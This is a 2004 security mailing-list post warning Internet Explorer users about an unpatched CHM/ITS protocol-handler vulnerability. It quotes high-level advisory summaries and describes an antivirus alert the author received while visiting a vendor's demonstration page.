[Dshield] An unfixed highly critical vulnerability discovered in Microsoft Internet Explorer

Peter Stendahl-Juvonen peter.stendahl-juvonen at welho.com
Thu Apr 8 13:15:52 GMT 2004

An unfixed highly critical vulnerability discovered in Microsoft
Internet Explorer


Wanted to ensure everyone concerned (MS IE 5.01, 5.5 and 6 users) on
this list is aware of this unfixed critical vulnerability:

Microsoft Internet Explorer does not properly validate source of CHM
components referenced by ITS protocol handlers

Overview: Microsoft Internet Explorer (IE) does not adequately validate
the source of script contained in compiled help (CHM) file components
that are referenced by the Microsoft InfoTech Storage (ITS) protocol
handlers. An attacker could exploit this vulnerability to execute script
in different security domains. By causing script to be run in the Local
Machine Zone, the attacker could execute arbitrary code with the
privileges of the user running IE.


AU-2004.007 -- AusCERT Update - Vulnerability in Internet Explorer
Allows Program Execution


Internet Explorer showHelp() Restriction Bypass Vulnerability

Critical: Highly critical 
Impact: Security Bypass
Where: From remote
Software: Microsoft Internet Explorer 5.01
Microsoft Internet Explorer 5.5
Microsoft Internet Explorer 6


When visited Secunia's web page (at the above address), I received the
following virus alert (issued by NAV2004):

Source: C:\Documents and Settings\username\Local Settings\Temporary
Internet Files\Content.IE5\0LU1UHY7\10523[1].htm 
Click for more information about this threat: Bloodhound.Exploit.6

Guess this is just Secunia's way of demonstrating the vulnerability's
existence on browsers concerned.

Since the virus was detected in browser's cache, access to the infected
file was denied and repair failed. After closing the browser a scan of
Temporary Internet Files, however show NO threats.



Bloodhound.Exploit.6 is a heuristic detection for exploits of a
Microsoft Internet Explorer vulnerability, which was discovered in
February 2004. 

The vulnerability results from the incorrect handling of HTML files
embedded in CHM files. (CHM is the Microsoft-compiled HTML help format.)

This vulnerability is known to be used in the wild.


- Pete

               "When we thought that we had all the answers,
                   suddenly all the questions changed." 
               Mario Benedetti (1920); Uruguayan writer.

More information about the list mailing list